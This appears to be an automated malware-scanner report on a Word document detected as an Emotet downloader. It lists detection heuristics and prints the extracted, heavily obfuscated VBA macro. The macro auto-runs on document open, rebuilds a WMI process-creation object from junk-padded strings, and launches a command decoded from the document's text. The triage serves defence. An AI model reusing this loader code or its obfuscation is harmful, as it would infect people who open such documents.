MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Eziv8pdh0pqro9icda = CreateObject(Uwy26xcq5lc8ah) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13381 bytes |
SHA-256: 7ca0390109e782c9e8f55c38a4fff76a3a65e73dfc2917176ac58f2fea8cca42 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
105 of 195 identifiers look randomly generated (e.g. 'Zopwvl4zgh8e58h0fs') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "U07z0wxwvvexaf9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G1dnl_1ulce
End Sub
Attribute VB_Name = "Sqrbtt3u7ee8a3hiw"
Attribute VB_Name = "Azexdgc4_qs24ty16"
Function G1dnl_1ulce()
On Error Resume Next
V1 = Iju_yvxchibk + U07z0wxwvvexaf9.Content + Zqs62wtvzxypni
GoTo CIRIIF
Dim NFkkpDEG As Paragraph
Set pwNooFhP = uCaoC
For Each NFkkpDEG In U07z0wxwvvexaf9.Paragraphs
Set wNVuFx = OySlFvzL
If Left(NFkkpDEG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CIRIIF = NFkkpDEG.Range.ListFormat.ListString
ElseIf InStr(NFkkpDEG.Range.Text, "kkiew") > 1 Then
EJfRnIbF = NFkkpDEG.Range.Text
EJfRnIbF = Replace(saw, "sjgwb", "hqkwjbjdasd" & CIRIIF)
NFkkpDEG.Range.Text = EJfRnIbF
Set NFkkpDEG.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set XbbiCC = LqQdB
Next NFkkpDEG
CIRIIF:
U7 = "sg yw ahpsg yw ah"
Ekhrpb5pv09i = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo nycVZr
Dim sQYNk As Paragraph
Set fNCREDkA = jUScFJ
For Each sQYNk In U07z0wxwvvexaf9.Paragraphs
Set dMkPJ = lYsLE
If Left(sQYNk.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nycVZr = sQYNk.Range.ListFormat.ListString
ElseIf InStr(sQYNk.Range.Text, "kkiew") > 1 Then
RUVwZJHLn = sQYNk.Range.Text
RUVwZJHLn = Replace(saw, "sjgwb", "hqkwjbjdasd" & nycVZr)
sQYNk.Range.Text = RUVwZJHLn
Set sQYNk.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ReiJFHOdJ = zbDaBH
Next sQYNk
nycVZr:
Jppibfk18hoqltzw8 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo CYpaGHF
Dim LPFlNrIIG As Paragraph
Set szNEFZILD = QCrPTC
For Each LPFlNrIIG In U07z0wxwvvexaf9.Paragraphs
Set ynQdAGG = xVTPC
If Left(LPFlNrIIG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CYpaGHF = LPFlNrIIG.Range.ListFormat.ListString
ElseIf InStr(LPFlNrIIG.Range.Text, "kkiew") > 1 Then
tyjqEFI = LPFlNrIIG.Range.Text
tyjqEFI = Replace(saw, "sjgwb", "hqkwjbjdasd" & CYpaGHF)
LPFlNrIIG.Range.Text = tyjqEFI
Set LPFlNrIIG.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set bNztGGE = VxKiEZECj
Next LPFlNrIIG
CYpaGHF:
Y8pxsco03vz = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo HhIdGF
Dim PSuTIC As Paragraph
Set UYusHBGOB = lNxECJvF
For Each PSuTIC In U07z0wxwvvexaf9.Paragraphs
Set ASmolAA = JHyYGGE
If Left(PSuTIC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HhIdGF = PSuTIC.Range.ListFormat.ListString
ElseIf InStr(PSuTIC.Range.Text, "kkiew") > 1 Then
UkAIDHVI = PSuTIC.Range.Text
UkAIDHVI = Replace(saw, "sjgwb", "hqkwjbjdasd" & HhIdGF)
PSuTIC.Range.Text = UkAIDHVI
Set PSuTIC.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FzygAJHO = VKvJBDFND
Next PSuTIC
HhIdGF:
Ib61wl_m8g_di2lm = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo NZuPHJa
Dim OqbfwFU As Paragraph
Set KmYLLI = LGueAAX
For Each OqbfwFU In U07z0wxwvvexaf9.Paragraphs
Set lEaopAS = OalGIb
If Left(OqbfwFU.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NZuPHJa = OqbfwFU.Range.ListFormat.ListString
ElseIf InStr(OqbfwFU.Range.Text, "kkiew") > 1 Then
LZnqxHzI = OqbfwFU.Range.Text
LZnqxHzI = Replace(saw, "sjgwb", "hqkwjbjdasd" & NZuPHJa)
OqbfwFU.Range.Text = LZnqxHzI
Set OqbfwFU.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ZvKKRAG = TPVeEGhI
Next OqbfwFU
NZuPHJa:
Nh_tciw9k1lg9 = Y8pxsco03vz + Ib61wl_m8g_di2lm + Jppibfk18hoqltzw8 + U7 + Ekhrpb5pv09i
GoTo mtbESE
Dim mUiPGCFF As Paragraph
Set GiwRHJ = sAiBQEEFF
For Each mUiPGCFF In U07z0wxwvvexaf9.Paragraphs
Set zAUSJlJ = bcpDTJk
If Left(mUiPGCFF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
mtbESE = mUiPGCFF.Range.ListFormat.ListString
ElseIf InStr(mUiPGCFF.Range.Text, "kkiew") > 1 Then
XPbxJ = mUiPGCFF.Range.Text
XPbxJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & mtbESE)
mUiPGCFF.Range.Text = XPbxJ
Set mUiPGCFF.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set BhHxZJ = cjijAEGCB
Next mUiPGCFF
mtbESE:
Uwy26xcq5lc8ah = X6a6c8jnzkz(Nh_tciw9k1lg9)
GoTo xnsPxEpW
Dim bJOfuB As Paragraph
Set WwVMuz = lCitGACAF
For Each bJOfuB In U07z0wxwvvexaf9.Paragraphs
Set PDGpRA = HboIEQ
If Left(bJOfuB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xnsPxEpW = bJOfuB.Range.ListFormat.ListString
ElseIf InStr(bJOfuB.Range.Text, "kkiew") > 1 Then
wzGTt = bJOfuB.Range.Text
wzGTt = Replace(saw, "sjgwb", "hqkwjbjdasd" & xnsPxEpW)
bJOfuB.Range.Text = wzGTt
Set bJOfuB.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set jjuvosEM = SlShq
Next bJOfuB
xnsPxEpW:
Set Eziv8pdh0pqro9icda = CreateObject(Uwy26xcq5lc8ah)
GoTo yRTNB
Dim IkThKWBXn As Paragraph
Set YzebOFJ = oNXNJIhAD
For Each IkThKWBXn In U07z0wxwvvexaf9.Paragraphs
Set ahzjFJI = qNWzIt
If Left(IkThKWBXn.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
yRTNB = IkThKWBXn.Range.ListFormat.ListString
ElseIf InStr(IkThKWBXn.Range.Text, "kkiew") > 1 Then
xKfkdBGYa = IkThKWBXn.Range.Text
xKfkdBGYa = Replace(saw, "sjgwb", "hqkwjbjdasd" & yRTNB)
IkThKWBXn.Range.Text = xKfkdBGYa
Set IkThKWBXn.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set NQnYHGBTy = kaJoHmI
Next IkThKWBXn
yRTNB:
KK = X6a6c8jnzkz(Mid(V1, (4), Len(V1)))
Eziv8pdh0pqro9icda.Create KK, L65b6nd2_pvtc961y, Boftpfr2oqytf
GoTo zupkBKAAe
Dim CnUnIFYqR As Paragraph
Set MaaxJ = EameIeD
For Each CnUnIFYqR In U07z0wxwvvexaf9.Paragraphs
Set oUnrRKQ = lnEMB
If Left(CnUnIFYqR.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zupkBKAAe = CnUnIFYqR.Range.ListFormat.ListString
ElseIf InStr(CnUnIFYqR.Range.Text, "kkiew") > 1 Then
cwYdtI = CnUnIFYqR.Range.Text
cwYdtI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zupkBKAAe)
CnUnIFYqR.Range.Text = cwYdtI
Set CnUnIFYqR.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set cPWWG = ZoiCFJGD
Next CnUnIFYqR
zupkBKAAe:
End Function
Function X6a6c8jnzkz(A3q8sxt0s84duate6k)
On Error Resume Next
GoTo lglXE
Dim xAtxD As Paragraph
Set HhiglJrQ = YAkOzGC
For Each xAtxD In U07z0wxwvvexaf9.Paragraphs
Set hwnAtm = DiDuDC
If Left(xAtxD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lglXE = xAtxD.Range.ListFormat.ListString
ElseIf InStr(xAtxD.Range.Text, "kkiew") > 1 Then
clXSjg = xAtxD.Range.Text
clXSjg = Replace(saw, "sjgwb", "hqkwjbjdasd" & lglXE)
xAtxD.Range.Text = clXSjg
Set xAtxD.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ykiTAHc = dDdLFPyq
Next xAtxD
lglXE:
Oik9tcwhxnhq5 = A3q8sxt0s84duate6k
GoTo SNUEDDADB
Dim UkCRGsFGT As Paragraph
Set XQnhLmMwg = RdoNf
For Each UkCRGsFGT In U07z0wxwvvexaf9.Paragraphs
Set HpqFFEQpE = rsTgUC
If Left(UkCRGsFGT.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SNUEDDADB = UkCRGsFGT.Range.ListFormat.ListString
ElseIf InStr(UkCRGsFGT.Range.Text, "kkiew") > 1 Then
CYWzxBFCC = UkCRGsFGT.Range.Text
CYWzxBFCC = Replace(saw, "sjgwb", "hqkwjbjdasd" & SNUEDDADB)
UkCRGsFGT.Range.Text = CYWzxBFCC
Set UkCRGsFGT.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FsrrMDA = yxYlOHEG
Next UkCRGsFGT
SNUEDDADB:
Lkem2rbnt9w = Zopwvl4zgh8e58h0fs(Oik9tcwhxnhq5)
GoTo aqAlAFCIZ
Dim PszRGyvC As Paragraph
Set YaYgJAGHD = wKiwC
For Each PszRGyvC In U07z0wxwvvexaf9.Paragraphs
Set RkIXSJ = ZJbIGAQIB
If Left(PszRGyvC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
aqAlAFCIZ = PszRGyvC.Range.ListFormat.ListString
ElseIf InStr(PszRGyvC.Range.Text, "kkiew") > 1 Then
OpKsQCC = PszRGyvC.Range.Text
OpKsQCC = Replace(saw, "sjgwb", "hqkwjbjdasd" & aqAlAFCIZ)
PszRGyvC.Range.Text = OpKsQCC
Set PszRGyvC.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set HRVFm = tgIiDKoQI
Next PszRGyvC
aqAlAFCIZ:
X6a6c8jnzkz = Lkem2rbnt9w
GoTo MtyUqjD
Dim gmJLv As Paragraph
Set cpGtEDX = ZhruqEfqo
For Each gmJLv In U07z0wxwvvexaf9.Paragraphs
Set fndAGAJE = fERYDGT
If Left(gmJLv.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
MtyUqjD = gmJLv.Range.ListFormat.ListString
ElseIf InStr(gmJLv.Range.Text, "kkiew") > 1 Then
nTnGLtNW = gmJLv.Range.Text
nTnGLtNW = Replace(saw, "sjgwb", "hqkwjbjdasd" & MtyUqjD)
gmJLv.Range.Text = nTnGLtNW
Set gmJLv.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set oUPsjBDY = EtoSDPI
Next gmJLv
MtyUqjD:
End Function
Function Zopwvl4zgh8e58h0fs(Rnyt6dvvfgp3ew)
GoTo nmGWBH
Dim cUzBLI As Paragraph
Set rRNcE = NBtgBDbG
For Each cUzBLI In U07z0wxwvvexaf9.Paragraphs
Set zgFOAiG = vxvjCHFbl
If Left(cUzBLI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nmGWBH = cUzBLI.Range.ListFormat.ListString
ElseIf InStr(cUzBLI.Range.Text, "kkiew") > 1 Then
vVifA = cUzBLI.Range.Text
vVifA = Replace(saw, "sjgwb", "hqkwjbjdasd" & nmGWBH)
cUzBLI.Range.Text = vVifA
Set cUzBLI.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set RXPfHwB = QnFGnEBf
Next cUzBLI
nmGWBH:
GoTo YJfnsFEE
Dim lRMjf As Paragraph
Set PhJQzGB = UuAlgyo
For Each lRMjf In U07z0wxwvvexaf9.Paragraphs
Set XbtjbAqJ = nUVrDGKU
If Left(lRMjf.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
YJfnsFEE = lRMjf.Range.ListFormat.ListString
ElseIf InStr(lRMjf.Range.Text, "kkiew") > 1 Then
RXQUeGF = lRMjf.Range.Text
RXQUeGF = Replace(saw, "sjgwb", "hqkwjbjdasd" & YJfnsFEE)
lRMjf.Range.Text = RXQUeGF
Set lRMjf.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set axmnQIAP = RzlLgHDHI
Next lRMjf
YJfnsFEE:
GoTo tmWlsCu
Dim WIUEGc As Paragraph
Set zQHBG = ruvjLV
For Each WIUEGc In U07z0wxwvvexaf9.Paragraphs
Set MkMzBCFI = gNpzdH
If Left(WIUEGc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
tmWlsCu = WIUEGc.Range.ListFormat.ListString
ElseIf InStr(WIUEGc.Range.Text, "kkiew") > 1 Then
ZGIMIWDCI = WIUEGc.Range.Text
ZGIMIWDCI = Replace(saw, "sjgwb", "hqkwjbjdasd" & tmWlsCu)
WIUEGc.Range.Text = ZGIMIWDCI
Set WIUEGc.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set aEDCpyH = IgXxH
Next WIUEGc
tmWlsCu:
Zopwvl4zgh8e58h0fs = Replace(Rnyt6dvvfgp3ew, "sg yw ah", Uatpdt1pwkbhgqvcr)
GoTo lEoUDAu
Dim gSxbEB As Paragraph
Set WnQtpICKz = vAyYkXRIP
For Each gSxbEB In U07z0wxwvvexaf9.Paragraphs
Set MIffeL = qsEZCJY
If Left(gSxbEB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lEoUDAu = gSxbEB.Range.ListFormat.ListString
ElseIf InStr(gSxbEB.Range.Text, "kkiew") > 1 Then
TJzKIdF = gSxbEB.Range.Text
TJzKIdF = Replace(saw, "sjgwb", "hqkwjbjdasd" & lEoUDAu)
gSxbEB.Range.Text = TJzKIdF
Set gSxbEB.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set lopVAHIAW = NeDsS
Next gSxbEB
lEoUDAu:
GoTo FWCrM
Dim iGdrUGZ As Paragraph
Set yyPnWCzx = mhyjG
For Each iGdrUGZ In U07z0wxwvvexaf9.Paragraphs
Set QwRtFIA = IHoSHE
If Left(iGdrUGZ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
FWCrM = iGdrUGZ.Range.ListFormat.ListString
ElseIf InStr(iGdrUGZ.Range.Text, "kkiew") > 1 Then
keihB = iGdrUGZ.Range.Text
keihB = Replace(saw, "sjgwb", "hqkwjbjdasd" & FWCrM)
iGdrUGZ.Range.Text = keihB
Set iGdrUGZ.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FJKkPeC = QTZzFBG
Next iGdrUGZ
FWCrM:
GoTo WkcYDC
Dim fIaIiBXFF As Paragraph
Set tEQdJ = HhkdJOA
For Each fIaIiBXFF In U07z0wxwvvexaf9.Paragraphs
Set UIVSDP = WRrcXC
If Left(fIaIiBXFF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
WkcYDC = fIaIiBXFF.Range.ListFormat.ListString
ElseIf InStr(fIaIiBXFF.Range.Text, "kkiew") > 1 Then
OniMG = fIaIiBXFF.Range.Text
OniMG = Replace(saw, "sjgwb", "hqkwjbjdasd" & WkcYDC)
fIaIiBXFF.Range.Text = OniMG
Set fIaIiBXFF.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set aJBDmCCF = IrsLEBNT
Next fIaIiBXFF
WkcYDC:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.